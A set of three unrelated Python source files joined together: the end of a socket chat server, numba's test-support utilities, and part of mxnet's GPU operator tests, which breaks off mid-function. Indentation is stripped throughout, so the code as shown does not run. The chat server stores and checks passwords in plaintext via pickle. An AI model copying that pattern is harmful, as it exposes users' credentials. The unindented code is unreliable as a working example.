updatefile("loginss.txt", loginss)
updatefile("pic.txt", pics)
print("USERS:", user, "signed up")
else:
# Else tell them they failed
send_to_client(clientsocket, "$fail-signup", key)
print("USERS: Received failed signup")
continue
elif(login[0] == '!'):
# Logging in
# In a try except to prevent key errors
try:
if(loginss[user] == passw):
# This is a successful login
# Marking such on server
username = user
# Tell the client
send_to_client(clientsocket, "$success-login", key)
print("USERS:", username, "signed in")
break
else:
# Unsuccessful login
# Tell them they failed
send_to_client(clientsocket, "$fail-login", key)
except:
# Probably key error, they need to sign up first
# Tell them they failed
send_to_client(clientsocket, "$fail-login", key)
# Only if they have logged in successfully
if(username != ''):
# If they are not connected (should be almost always)
if username not in connected_list:
# mark thier username as conncted
connected_list.append(username)
# Tell clients about new profile picture and new client username
send_all(username, "p"+str(pics[username])+" "+username)
new_online(username)
print("USERS: Sent", username, "is online")
# Record sockets and keys for easy access by utility functions
record[clientsocket] = username
records[username] = clientsocket
keys[username] = key
# Listen and act until told not to
while True:
# Receive using function
msg = client_receive(clientsocket, otherkey)
# Make sure client hasnt disconnected
if msg == "disconnect":
# If they have tell other clients and remove them from lists
connected_list.remove(username)
del keys[username]
clientsocket.close()
send_all("", "-"+username)
print("Users: " + username + " quit")
break
# Interpreting comands from clients using codes from the table at the top
if msg[0] == '@':
# Split message
recievername = msg[1:].split(" ", 1)
# Determine sockets and keys
receiversoc = records[recievername[0]]
reckey = keys[recievername[0]]
# Create message
tosend = "@" + username + " " + recievername[1]
print("MESSAGES: " + username + " SENT " + recievername[1] + " TO " + recievername[0])
# Send
send_to_client(receiversoc, tosend, reckey)
elif msg[0] == '^':
# Determine sendername
sendername = record[clientsocket]
# Remove whitespace
tosend = msg[1:].strip()
print("MESSAGES: " + sendername + " SENT " + tosend + " TO ALL USERS")
# Send to all using function
msg_all(tosend, sendername)
elif msg[0] == '*':
# If request connected list, send list
print("DEBUG:", username, "requested list")
send_to_client(clientsocket, connected_list, key)
elif msg[0] == 'p':
# Determine sendername
sendername = record[clientsocket]
# Update memory list and file
pics[sendername] = msg[1]
updatefile("pic.txt", pics)
# Tell other clients of updated picture
send_all('', msg + " " + sendername)
print("USERS:", sendername, "changed their profile picture to:", msg[1])
elif msg[0] == '=':
# If request pic dict, send pic dict
print("DEBUG:", username, "requested pics dict")
send_to_client(clientsocket, pics, key)
except:
# This is usually a logoff
try:
# This is when they are registered and logged in
clientsocket.close()
connected_list.remove(username)
del keys[username]
# Tell other clients
send_all("", "-"+username)
print("USERS: " + username + " quit")
except:
# If they arn't registered, the above code will have already closed the socket, so just record and quit
print("USERS: Non-Authenicated user quit")
# Code skips to here
# Check if both files exist and populate memory with their contents it they do
# If they don't, set memory contents to empty and create files
# Also log it at the end, so the server runner knows what just happened
if file_exists("loginss") == False:
file = open("loginss.txt", "w+")
file.close()
with open('loginss.txt', 'rb') as file:
try:
loginss = pickle.load(file)
except:
print("DEBUG: Failed reading file (the login file is probably empty, no need to worry)")
if file_exists("pic") == False:
file = open("pic.txt", "w+")
file.close()
with open('pic.txt', 'rb') as file:
try:
pics = pickle.load(file)
except:
print("DEBUG: Failed reading file (the pic file is probably empty, no need to worry)")
# Telling the host that it doesn't need to filter ips
host = ''
# Setting the port
port = 443
# Bind to the port
s.bind((host, port))
# Allow up to ten messages stcked up
s.listen(10)
# Now wait for client connection.
print("DEBUG: Started on:", (host, port))
print("DEBUG: Ready for clients")
while True:
# Blocking call, waits to accept a connection
conn, addr = s.accept()
# Log it
print("NETWORK: Connected to " + addr[0] + ":" + str(addr[1]))
# Start a new thread to new client
threading.Thread(target=on_new_client, args=(conn,addr)).start()
print("\nDEBUG: Started new thread")
# Main thread continues listening loop to assingn new threads to new clients
# In the rare case we are here, close down the server socket gracefully and then quit
s.close()
|
support.py
|
"""
Assorted utilities for use in tests.
"""
from __future__ import print_function
import cmath
import contextlib
import enum
import errno
import gc
import math
import os
import shutil
import subprocess
import sys
import tempfile
import time
import io
import ctypes
import multiprocessing as mp
import warnings
from contextlib import contextmanager
import numpy as np
try:
import scipy
except ImportError:
scipy = None
from numba import config, errors, typing, utils, numpy_support, testing
from numba.compiler import compile_extra, compile_isolated, Flags, DEFAULT_FLAGS
from numba.targets import cpu
import numba.unittest_support as unittest
from numba.runtime import rtsys
from numba.six import PY2
enable_pyobj_flags = Flags()
enable_pyobj_flags.set("enable_pyobject")
force_pyobj_flags = Flags()
force_pyobj_flags.set("force_pyobject")
no_pyobj_flags = Flags()
nrt_flags = Flags()
nrt_flags.set("nrt")
tag = testing.make_tag_decorator(['important', 'long_running'])
_windows_py27 = (sys.platform.startswith('win32') and
sys.version_info[:2] == (2, 7))
_32bit = sys.maxsize <= 2 ** 32
_reason = 'parfors not supported'
skip_parfors_unsupported = unittest.skipIf(_32bit or _windows_py27, _reason)
skip_py38_or_later = unittest.skipIf(
utils.PYVERSION >= (3, 8),
"unsupported on py3.8 or later"
)
skip_tryexcept_unsupported = unittest.skipIf(
utils.PYVERSION < (3, 7),
"try-except unsupported on py3.6 or earlier"
)
skip_tryexcept_supported = unittest.skipIf(
utils.PYVERSION >= (3, 7),
"try-except supported on py3.7 or later"
)
_msg = "SciPy needed for test"
skip_unless_scipy = unittest.skipIf(scipy is None, _msg)
class CompilationCache(object):
"""
A cache of compilation results for various signatures and flags.
This can make tests significantly faster (or less slow).
"""
def __init__(self):
self.typingctx = typing.Context()
self.targetctx = cpu.CPUContext(self.typingctx)
self.cr_cache = {}
def compile(self, func, args, return_type=None, flags=DEFAULT_FLAGS):
"""
Compile the function or retrieve an already compiled result
from the cache.
"""
from numba.targets.registry import cpu_target
cache_key = (func, args, return_type, flags)
try:
cr = self.cr_cache[cache_key]
except KeyError:
# Register the contexts in case for nested @jit or @overload calls
# (same as compile_isolated())
with cpu_target.nested_context(self.typingctx, self.targetctx):
cr = compile_extra(self.typingctx, self.targetctx, func,
args, return_type, flags, locals={})
self.cr_cache[cache_key] = cr
return cr
class TestCase(unittest.TestCase):
longMessage = True
# A random state yielding the same random numbers for any test case.
# Use as `self.random.<method name>`
@utils.cached_property
def random(self):
return np.random.RandomState(42)
def reset_module_warnings(self, module):
"""
Reset the warnings registry of a module. This can be necessary
as the warnings module is buggy in that regard.
See http://bugs.python.org/issue4180
"""
if isinstance(module, str):
module = sys.modules[module]
try:
del module.__warningregistry__
except AttributeError:
pass
@contextlib.contextmanager
def assertTypingError(self):
"""
A context manager that asserts the enclosed code block fails
compiling in nopython mode.
"""
_accepted_errors = (errors.LoweringError, errors.TypingError,
TypeError, NotImplementedError)
with self.assertRaises(_accepted_errors) as cm:
yield cm
@contextlib.contextmanager
def assertRefCount(self, *objects):
"""
A context manager that asserts the given objects have the
same reference counts before and after executing the
enclosed block.
"""
old_refcounts = [sys.getrefcount(x) for x in objects]
yield
new_refcounts = [sys.getrefcount(x) for x in objects]
for old, new, obj in zip(old_refcounts, new_refcounts, objects):
if old != new:
self.fail("Refcount changed from %d to %d for object: %r"
% (old, new, obj))
@contextlib.contextmanager
def assertNoNRTLeak(self):
"""
A context manager that asserts no NRT leak was created during
the execution of the enclosed block.
"""
old = rtsys.get_allocation_stats()
yield
new = rtsys.get_allocation_stats()
total_alloc = new.alloc - old.alloc
total_free = new.free - old.free
total_mi_alloc = new.mi_alloc - old.mi_alloc
total_mi_free = new.mi_free - old.mi_free
self.assertEqual(total_alloc, total_free,
"number of data allocs != number of data frees")
self.assertEqual(total_mi_alloc, total_mi_free,
"number of meminfo allocs != number of meminfo frees")
_bool_types = (bool, np.bool_)
_exact_typesets = [_bool_types, utils.INT_TYPES, (str,), (np.integer,),
(utils.text_type), (bytes, np.bytes_)]
_approx_typesets = [(float,), (complex,), (np.inexact)]
_sequence_typesets = [(tuple, list)]
_float_types = (float, np.floating)
_complex_types = (complex, np.complexfloating)
def _detect_family(self, numeric_object):
"""
This function returns a string description of the type family
that the object in question belongs to. Possible return values
are: "exact", "complex", "approximate", "sequence", and "unknown"
"""
if isinstance(numeric_object, np.ndarray):
return "ndarray"
if isinstance(numeric_object, enum.Enum):
return "enum"
for tp in self._sequence_typesets:
if isinstance(numeric_object, tp):
return "sequence"
for tp in self._exact_typesets:
if isinstance(numeric_object, tp):
return "exact"
for tp in self._complex_types:
if isinstance(numeric_object, tp):
return "complex"
for tp in self._approx_typesets:
if isinstance(numeric_object, tp):
return "approximate"
return "unknown"
def _fix_dtype(self, dtype):
"""
Fix the given *dtype* for comparison.
"""
# Under 64-bit Windows, Numpy may return either int32 or int64
# arrays depending on the function.
if (sys.platform == 'win32' and sys.maxsize > 2**32 and
dtype == np.dtype('int32')):
return np.dtype('int64')
else:
return dtype
def _fix_strides(self, arr):
"""
Return the strides of the given array, fixed for comparison.
Strides for 0- or 1-sized dimensions are ignored.
"""
if arr.size == 0:
return [0] * arr.ndim
else:
return [stride / arr.itemsize
for (stride, shape) in zip(arr.strides, arr.shape)
if shape > 1]
def assertStridesEqual(self, first, second):
"""
Test that two arrays have the same shape and strides.
"""
self.assertEqual(first.shape, second.shape, "shapes differ")
self.assertEqual(first.itemsize, second.itemsize, "itemsizes differ")
self.assertEqual(self._fix_strides(first), self._fix_strides(second),
"strides differ")
def assertPreciseEqual(self, first, second, prec='exact', ulps=1,
msg=None, ignore_sign_on_zero=False,
abs_tol=None
):
"""
Versatile equality testing function with more built-in checks than
standard assertEqual().
For arrays, test that layout, dtype, shape are identical, and
recursively call assertPreciseEqual() on the contents.
For other sequences, recursively call assertPreciseEqual() on
the contents.
For scalars, test that two scalars or have similar types and are
equal up to a computed precision.
If the scalars are instances of exact types or if *prec* is
'exact', they are compared exactly.
If the scalars are instances of inexact types (float, complex)
and *prec* is not 'exact', then the number of significant bits
is computed according to the value of *prec*: 53 bits if *prec*
is 'double', 24 bits if *prec* is single. This number of bits
can be lowered by raising the *ulps* value.
ignore_sign_on_zero can be set to True if zeros are to be considered
equal regardless of their sign bit.
abs_tol if this is set to a float value its value is used in the
following. If, however, this is set to the string "eps" then machine
precision of the type(first) is used in the following instead. This
kwarg is used to check if the absolute difference in value between first
and second is less than the value set, if so the numbers being compared
are considered equal. (This is to handle small numbers typically of
magnitude less than machine precision).
Any value of *prec* other than 'exact', 'single' or 'double'
will raise an error.
"""
try:
self._assertPreciseEqual(first, second, prec, ulps, msg,
ignore_sign_on_zero, abs_tol)
except AssertionError as exc:
failure_msg = str(exc)
# Fall off of the 'except' scope to avoid Python 3 exception
# chaining.
else:
return
# Decorate the failure message with more information
self.fail("when comparing %s and %s: %s" % (first, second, failure_msg))
def _assertPreciseEqual(self, first, second, prec='exact', ulps=1,
msg=None, ignore_sign_on_zero=False,
abs_tol=None):
"""Recursive workhorse for assertPreciseEqual()."""
def _assertNumberEqual(first, second, delta=None):
if (delta is None or first == second == 0.0
or math.isinf(first) or math.isinf(second)):
self.assertEqual(first, second, msg=msg)
# For signed zeros
if not ignore_sign_on_zero:
try:
if math.copysign(1, first) != math.copysign(1, second):
self.fail(
self._formatMessage(msg,
"%s != %s" %
(first, second)))
except TypeError:
pass
else:
self.assertAlmostEqual(first, second, delta=delta, msg=msg)
first_family = self._detect_family(first)
second_family = self._detect_family(second)
assertion_message = "Type Family mismatch. (%s != %s)" % (first_family,
second_family)
if msg:
assertion_message += ': %s' % (msg,)
self.assertEqual(first_family, second_family, msg=assertion_message)
# We now know they are in the same comparison family
compare_family = first_family
# For recognized sequences, recurse
if compare_family == "ndarray":
dtype = self._fix_dtype(first.dtype)
self.assertEqual(dtype, self._fix_dtype(second.dtype))
self.assertEqual(first.ndim, second.ndim,
"different number of dimensions")
self.assertEqual(first.shape, second.shape,
"different shapes")
self.assertEqual(first.flags.writeable, second.flags.writeable,
"different mutability")
# itemsize is already checked by the dtype test above
self.assertEqual(self._fix_strides(first),
self._fix_strides(second), "different strides")
if first.dtype != dtype:
first = first.astype(dtype)
if second.dtype != dtype:
second = second.astype(dtype)
for a, b in zip(first.flat, second.flat):
self._assertPreciseEqual(a, b, prec, ulps, msg,
ignore_sign_on_zero, abs_tol)
return
elif compare_family == "sequence":
self.assertEqual(len(first), len(second), msg=msg)
for a, b in zip(first, second):
self._assertPreciseEqual(a, b, prec, ulps, msg,
ignore_sign_on_zero, abs_tol)
return
elif compare_family == "exact":
exact_comparison = True
elif compare_family in ["complex", "approximate"]:
exact_comparison = False
elif compare_family == "enum":
self.assertIs(first.__class__, second.__class__)
self._assertPreciseEqual(first.value, second.value,
prec, ulps, msg,
ignore_sign_on_zero, abs_tol)
return
elif compare_family == "unknown":
# Assume these are non-numeric types: we will fall back
# on regular unittest comparison.
self.assertIs(first.__class__, second.__class__)
exact_comparison = True
else:
assert 0, "unexpected family"
# If a Numpy scalar, check the dtype is exactly the same too
# (required for datetime64 and timedelta64).
if hasattr(first, 'dtype') and hasattr(second, 'dtype'):
self.assertEqual(first.dtype, second.dtype)
# Mixing bools and non-bools should always fail
if (isinstance(first, self._bool_types) !=
isinstance(second, self._bool_types)):
assertion_message = ("Mismatching return types (%s vs. %s)"
% (first.__class__, second.__class__))
if msg:
assertion_message += ': %s' % (msg,)
self.fail(assertion_message)
try:
if cmath.isnan(first) and cmath.isnan(second):
# The NaNs will compare unequal, skip regular comparison
return
except TypeError:
# Not floats.
pass
# if absolute comparison is set, use it
if abs_tol is not None:
if abs_tol == "eps":
rtol = np.finfo(type(first)).eps
elif isinstance(abs_tol, float):
rtol = abs_tol
else:
raise ValueError("abs_tol is not \"eps\" or a float, found %s"
% abs_tol)
if abs(first - second) < rtol:
return
exact_comparison = exact_comparison or prec == 'exact'
if not exact_comparison and prec != 'exact':
if prec == 'single':
bits = 24
elif prec == 'double':
bits = 53
else:
raise ValueError("unsupported precision %r" % (prec,))
k = 2 ** (ulps - bits - 1)
delta = k * (abs(first) + abs(second))
else:
delta = None
if isinstance(first, self._complex_types):
_assertNumberEqual(first.real, second.real, delta)
_assertNumberEqual(first.imag, second.imag, delta)
elif isinstance(first, (np.timedelta64, np.datetime64)):
# Since Np 1.16 NaT == NaT is False, so special comparison needed
if numpy_support.version >= (1, 16) and np.isnat(first):
self.assertEqual(np.isnat(first), np.isnat(second))
else:
_assertNumberEqual(first, second, delta)
else:
_assertNumberEqual(first, second, delta)
def run_nullary_func(self, pyfunc, flags):
"""
Compile the 0-argument *pyfunc* with the given *flags*, and check
it returns the same result as the pure Python function.
The got and expected results are returned.
"""
cr = compile_isolated(pyfunc, (), flags=flags)
cfunc = cr.entry_point
expected = pyfunc()
got = cfunc()
self.assertPreciseEqual(got, expected)
return got, expected
if PY2:
@contextmanager
def subTest(self, *args, **kwargs):
"""A stub TestCase.subTest backport.
This implementation is a no-op.
"""
yield
class SerialMixin(object):
"""Mixin to mark test for serial execution.
"""
_numba_parallel_test_ = False
# Various helpers
@contextlib.contextmanager
def override_config(name, value):
"""
Return a context manager that temporarily sets Numba config variable
*name* to *value*. *name* must be the name of an existing variable
in numba.config.
"""
old_value = getattr(config, name)
setattr(config, name, value)
try:
yield
finally:
setattr(config, name, old_value)
@contextlib.contextmanager
def override_env_config(name, value):
"""
Return a context manager that temporarily sets an Numba config environment
*name* to *value*.
"""
old = os.environ.get(name)
os.environ[name] = value
config.reload_config()
try:
yield
finally:
if old is None:
# If it wasn't set originally, delete the environ var
del os.environ[name]
else:
# Otherwise, restore to the old value
os.environ[name] = old
# Always reload config
config.reload_config()
def compile_function(name, code, globs):
"""
Given a *code* string, compile it with globals *globs* and return
the function named *name*.
"""
co = compile(code.rstrip(), "<string>", "single")
ns = {}
eval(co, globs, ns)
return ns[name]
def tweak_code(func, codestring=None, consts=None):
"""
Tweak the code object of the given function by replacing its
*codestring* (a bytes object) and *consts* tuple, optionally.
"""
co = func.__code__
tp = type(co)
if codestring is None:
codestring = co.co_code
if consts is None:
consts = co.co_consts
if sys.version_info >= (3, 8):
new_code = tp(co.co_argcount, co.co_posonlyargcount,
co.co_kwonlyargcount, co.co_nlocals,
co.co_stacksize, co.co_flags, codestring,
consts, co.co_names, co.co_varnames,
co.co_filename, co.co_name, co.co_firstlineno,
co.co_lnotab)
elif sys.version_info >= (3,):
new_code = tp(co.co_argcount, co.co_kwonlyargcount, co.co_nlocals,
co.co_stacksize, co.co_flags, codestring,
consts, co.co_names, co.co_varnames,
co.co_filename, co.co_name, co.co_firstlineno,
co.co_lnotab)
else:
new_code = tp(co.co_argcount, co.co_nlocals,
co.co_stacksize, co.co_flags, codestring,
consts, co.co_names, co.co_varnames,
co.co_filename, co.co_name, co.co_firstlineno,
co.co_lnotab)
func.__code__ = new_code
_trashcan_dir = 'numba-tests'
if os.name == 'nt':
# Under Windows, gettempdir() points to the user-local temp dir
_trashcan_dir = os.path.join(tempfile.gettempdir(), _trashcan_dir)
else:
# Mix the UID into the directory name to allow different users to
# run the test suite without permission errors (issue #1586)
_trashcan_dir = os.path.join(tempfile.gettempdir(),
"%s.%s" % (_trashcan_dir, os.getuid()))
# Stale temporary directories are deleted after they are older than this value.
# The test suite probably won't ever take longer than this...
_trashcan_timeout = 24 * 3600 # 1 day
def _create_trashcan_dir():
try:
os.mkdir(_trashcan_dir)
except OSError as e:
if e.errno != errno.EEXIST:
raise
def _purge_trashcan_dir():
freshness_threshold = time.time() - _trashcan_timeout
for fn in sorted(os.listdir(_trashcan_dir)):
fn = os.path.join(_trashcan_dir, fn)
try:
st = os.stat(fn)
if st.st_mtime < freshness_threshold:
shutil.rmtree(fn, ignore_errors=True)
except OSError as e:
# In parallel testing, several processes can attempt to
# remove the same entry at once, ignore.
pass
def _create_trashcan_subdir(prefix):
_purge_trashcan_dir()
path = tempfile.mkdtemp(prefix=prefix + '-', dir=_trashcan_dir)
return path
def temp_directory(prefix):
"""
Create a temporary directory with the given *prefix* that will survive
at least as long as this process invocation. The temporary directory
will be eventually deleted when it becomes stale enough.
This is necessary because a DLL file can't be deleted while in use
under Windows.
An interesting side-effect is to be able to inspect the test files
shortly after a test suite run.
"""
_create_trashcan_dir()
return _create_trashcan_subdir(prefix)
def import_dynamic(modname):
"""
Import and return a module of the given name. Care is taken to
avoid issues due to Python's internal directory caching.
"""
if sys.version_info >= (3, 3):
import importlib
importlib.invalidate_caches()
__import__(modname)
return sys.modules[modname]
# From CPython
@contextlib.contextmanager
def captured_output(stream_name):
"""Return a context manager used by captured_stdout/stdin/stderr
that temporarily replaces the sys stream *stream_name* with a StringIO."""
orig_stdout = getattr(sys, stream_name)
setattr(sys, stream_name, utils.StringIO())
try:
yield getattr(sys, stream_name)
finally:
setattr(sys, stream_name, orig_stdout)
def captured_stdout():
"""Capture the output of sys.stdout:
with captured_stdout() as stdout:
print("hello")
self.assertEqual(stdout.getvalue(), "hello\n")
"""
return captured_output("stdout")
def captured_stderr():
"""Capture the output of sys.stderr:
with captured_stderr() as stderr:
print("hello", file=sys.stderr)
self.assertEqual(stderr.getvalue(), "hello\n")
"""
return captured_output("stderr")
@contextlib.contextmanager
def capture_cache_log():
with captured_stdout() as out:
with override_config('DEBUG_CACHE', True):
yield out
class MemoryLeak(object):
__enable_leak_check = True
def memory_leak_setup(self):
# Clean up any NRT-backed objects hanging in a dead reference cycle
gc.collect()
self.__init_stats = rtsys.get_allocation_stats()
def memory_leak_teardown(self):
if self.__enable_leak_check:
self.assert_no_memory_leak()
def assert_no_memory_leak(self):
old = self.__init_stats
new = rtsys.get_allocation_stats()
total_alloc = new.alloc - old.alloc
total_free = new.free - old.free
total_mi_alloc = new.mi_alloc - old.mi_alloc
total_mi_free = new.mi_free - old.mi_free
self.assertEqual(total_alloc, total_free)
self.assertEqual(total_mi_alloc, total_mi_free)
def disable_leak_check(self):
# For per-test use when MemoryLeakMixin is injected into a TestCase
self.__enable_leak_check = False
class MemoryLeakMixin(MemoryLeak):
def setUp(self):
super(MemoryLeakMixin, self).setUp()
self.memory_leak_setup()
def tearDown(self):
super(MemoryLeakMixin, self).tearDown()
gc.collect()
self.memory_leak_teardown()
@contextlib.contextmanager
def forbid_codegen():
"""
Forbid LLVM code generation during the execution of the context
manager's enclosed block.
If code generation is invoked, a RuntimeError is raised.
"""
from numba.targets import codegen
patchpoints = ['CodeLibrary._finalize_final_module']
old = {}
def fail(*args, **kwargs):
raise RuntimeError("codegen forbidden by test case")
try:
# XXX use the mock library instead?
for name in patchpoints:
parts = name.split('.')
obj = codegen
for attrname in parts[:-1]:
obj = getattr(obj, attrname)
attrname = parts[-1]
value = getattr(obj, attrname)
assert callable(value), ("%r should be callable" % name)
old[obj, attrname] = value
setattr(obj, attrname, fail)
yield
finally:
for (obj, attrname), value in old.items():
setattr(obj, attrname, value)
# For details about redirection of file-descriptor, read
# https://eli.thegreenplace.net/2015/redirecting-all-kinds-of-stdout-in-python/
@contextlib.contextmanager
def redirect_fd(fd):
"""
Temporarily redirect *fd* to a pipe's write end and return a file object
wrapping the pipe's read end.
"""
from numba import _helperlib
libnumba = ctypes.CDLL(_helperlib.__file__)
libnumba._numba_flush_stdout()
save = os.dup(fd)
r, w = os.pipe()
try:
os.dup2(w, fd)
yield io.open(r, "r")
finally:
libnumba._numba_flush_stdout()
os.close(w)
os.dup2(save, fd)
os.close(save)
def redirect_c_stdout():
"""Redirect C stdout
"""
fd = sys.__stdout__.fileno()
return redirect_fd(fd)
def run_in_new_process_caching(func, cache_dir_prefix=__name__, verbose=True):
"""Spawn a new process to run `func` with a temporary cache directory.
The childprocess's stdout and stderr will be captured and redirected to
the current process's stdout and stderr.
Returns
-------
ret : dict
exitcode: 0 for success. 1 for exception-raised.
stdout: str
stderr: str
"""
ctx = mp.get_context('spawn')
qout = ctx.Queue()
cache_dir = temp_directory(cache_dir_prefix)
with override_env_config('NUMBA_CACHE_DIR', cache_dir):
proc = ctx.Process(target=_remote_runner, args=[func, qout])
proc.start()
proc.join()
stdout = qout.get_nowait()
stderr = qout.get_nowait()
if verbose and stdout.strip():
print()
print('STDOUT'.center(80, '-'))
print(stdout)
if verbose and stderr.strip():
print(file=sys.stderr)
print('STDERR'.center(80, '-'), file=sys.stderr)
print(stderr, file=sys.stderr)
return {
'exitcode': proc.exitcode,
'stdout': stdout,
'stderr': stderr,
}
def _remote_runner(fn, qout):
"""Used by `run_in_new_process_caching()`
"""
with captured_stderr() as stderr:
with captured_stdout() as stdout:
try:
fn()
except Exception:
traceback.print_exc()
exitcode = 1
else:
exitcode = 0
qout.put(stdout.getvalue())
qout.put(stderr.getvalue())
sys.exit(exitcode)
class CheckWarningsMixin(object):
@contextlib.contextmanager
def check_warnings(self, messages, category=RuntimeWarning):
with warnings.catch_warnings(record=True) as catch:
warnings.simplefilter("always")
yield
found = 0
for w in catch:
for m in messages:
if m in str(w.message):
self.assertEqual(w.category, category)
found += 1
self.assertEqual(found, len(messages))
|
test_operator_gpu.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import sys
import os
import time
import multiprocessing as mp
import unittest
import mxnet as mx
import numpy as np
import unittest
from nose.tools import assert_raises
from mxnet.test_utils import check_consistency, set_default_context, assert_almost_equal
from mxnet.base import MXNetError
from mxnet import autograd
from numpy.testing import assert_allclose
curr_path = os.path.dirname(os.path.abspath(os.path.expanduser(__file__)))
sys.path.insert(0, os.path.join(curr_path, '../unittest'))
from common import setup_module, with_seed
from test_operator import *
from test_optimizer import *
from test_random import *
from test_gluon import *
from test_loss import *
from test_exc_handling import *
#from test_rnn import *
from test_gluon_rnn import *
from test_sparse_ndarray import test_create_csr, test_create_row_sparse, test_sparse_nd_slice
from test_sparse_ndarray import test_create_sparse_nd_empty, test_create_sparse_nd_from_sparse
from test_sparse_ndarray import test_create_sparse_nd_from_dense, test_create_sparse_nd_infer_shape
from test_sparse_ndarray import test_sparse_nd_check_format, test_sparse_nd_copy
from test_sparse_ndarray import test_sparse_nd_setitem, test_sparse_nd_binary_scalar_op
from test_sparse_operator import *
from test_ndarray import *
set_default_context(mx.gpu(0))
del test_support_vector_machine_l1_svm
del test_support_vector_machine_l2_svm
def check_countsketch(in_dim,out_dim,n):
sym = mx.sym.contrib.count_sketch(name='countsketch',out_dim = out_dim)
shape = [(n,in_dim), (1,in_dim),(1,in_dim)] #shape of input x, hash h and hash s
arr = [mx.nd.empty(shape[i]) for i in range(3)]
arr_grad = [mx.nd.empty(shape[i]) for i in range(3)]
x = np.random.uniform(-10, 10, shape[0])
arr[0][:] = x #input x
h = np.random.randint(0, out_dim, shape[1])
arr[1][:] = h #hash h
s = np.random.randint(0, 2, shape[2])*2-np.ones(shape[2])
arr[2][:] = s #hash s
# forward
exe_list = [sym.bind(mx.gpu(0), arr, arr_grad)]
for exe in exe_list:
exe.forward(is_train= True)
out1 = [exe.outputs[0].asnumpy() for exe in exe_list]
a = np.zeros((n,out_dim))
temp = np.multiply(x, s)
for num_sample in np.arange(0,n):
for idx in np.arange(0,in_dim):
a[num_sample][h[0][idx]] += temp[num_sample][idx]
assert_almost_equal(a,out1[0],rtol=1e-3, atol=1e-12)
# backward
out_grad = mx.nd.empty((n,out_dim))
out_grad[:] = np.random.normal(-3, 3, (n,out_dim))
for exe in exe_list:
exe.backward([out_grad])
a = np.zeros((n,in_dim))
for j in np.arange(0,n):
for i in np.arange(0,in_dim):
a[j,i] = out_grad.asnumpy()[j, h[0,i]] * s[0,i]
assert_almost_equal(a,arr_grad[0].asnumpy(),rtol=1e-3, atol=1e-12)
@with_seed(0)
def test_countsketch():
nrepeat = 2
minindim = 40
maxindim = 100
minoutdim = 5
maxoutdim = 30
maxn = 200
for repeat in range(nrepeat):
in_dim = np.random.randint(minindim, maxindim)
out_dim = np.random.randint(minoutdim, maxoutdim)
n = np.random.randint(1,maxn)
check_countsketch(in_dim, out_dim, n)
def check_ifft(shape):
shape_old = shape
if len(shape) == 2:
if shape[1]%2 != 0:
lst = list(shape)
lst[1] = lst[1]*2
shape = tuple(lst)
shape_old = shape
shape = (shape[0],shape[1]*2)
if len(shape) == 4:
if shape[3]%2 != 0:
lst = list(shape)
lst[3] = lst[3]*2
shape = tuple(lst)
shape_old = shape
shape = (shape[0],shape[1],shape[2],shape[3]*2)
sym = mx.sym.contrib.ifft(name='ifft', compute_size = 128)
init = [np.random.normal(size=shape, scale=1.0)]
arr_grad = [mx.nd.empty(shape)]
ctx_list = [{'ctx': mx.gpu(0),'ifft_data': shape, 'type_dict': {'ifft_data': np.float32}}]
exe_list = [sym.simple_bind(args_grad=arr_grad,**ctx) for ctx in ctx_list]
for exe in exe_list:
for arr, iarr in zip(exe.arg_arrays, init):
arr[:] = iarr.astype(arr.dtype)
# forward
for exe in exe_list:
exe.forward(is_train= True)
out1 = [exe.outputs[0].asnumpy() for exe in exe_list]
if len(shape) == 2:
init_complex = np.zeros(shape_old,dtype = np.complex64)
for i in range(0,shape_old[1]):
init_complex.real[:,i] = init[0][:,2*i]
init_complex.imag[:,i] = init[0][:,2*i+1]
a = np.fft.ifft(init_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, out1[0]/shape_old[1],rtol=1e-3, atol=1e-12)
if len(shape) == 4:
init_complex = np.zeros(shape_old,dtype = np.complex64)
for i in range(0,shape_old[3]):
init_complex.real[:,:,:,i] = init[0][:,:,:,2*i]
init_complex.imag[:,:,:,i] = init[0][:,:,:,2*i+1]
a = np.fft.ifft(init_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, out1[0]/shape_old[3],rtol=1e-3, atol=1e-12)
# backward
if len(shape) == 2:
out_grad = mx.nd.empty(shape_old)
out_grad[:] = np.random.normal(-3, 3, shape_old)
for exe in exe_list:
exe.backward([out_grad])
temp = exe.grad_arrays[0].asnumpy()
temp = np.zeros(shape_old)
for i in range(shape_old[1]):
temp[:,i] = exe.grad_arrays[0].asnumpy()[:,2*i]
a = np.fft.fft(out_grad.asnumpy(), n=None, axis=-1, norm=None)
assert_almost_equal(a.real, temp, rtol=1e-3, atol=1e-12)
if len(shape) == 4:
out_grad = mx.nd.empty(shape_old)
out_grad[:] = np.random.normal(-3, 3, shape_old)
for exe in exe_list:
exe.backward([out_grad])
temp = exe.grad_arrays[0].asnumpy()
temp = np.zeros(shape_old)
for i in range(shape_old[3]):
temp[:,:,:,i] = exe.grad_arrays[0].asnumpy()[:,:,:,2*i]
a = np.fft.fft(out_grad.asnumpy(), n=None, axis=-1, norm=None)
assert_almost_equal(a.real, temp, rtol=1e-3, atol=1e-12)
@with_seed(0)
def test_ifft():
nrepeat = 2
maxdim = 10
for repeat in range(nrepeat):
for order in [2,4]:
shape = tuple(np.random.randint(1, maxdim, size=order))
check_ifft(shape)
def check_fft(shape):
sym = mx.sym.contrib.fft(name='fft', compute_size = 128)
if len(shape) == 2:
if shape[1]%2 != 0:
lst = list(shape)
lst[1] = lst[1]*2
shape = tuple(lst)
shape_old = shape
if len(shape) == 4:
if shape[3]%2 != 0:
lst = list(shape)
lst[3] = lst[3]*2
shape = tuple(lst)
shape_old = shape
init = [np.random.normal(size=shape, scale=1.0)]
arr_grad = [mx.nd.empty(shape)]
ctx_list = [{'ctx': mx.gpu(0),'fft_data': shape, 'type_dict': {'fft_data': np.float32}}]
exe_list = [sym.simple_bind(args_grad=arr_grad,**ctx) for ctx in ctx_list]
for exe in exe_list:
for arr, iarr in zip(exe.arg_arrays, init):
arr[:] = iarr.astype(arr.dtype)
#forward
for exe in exe_list:
exe.forward(is_train=True)
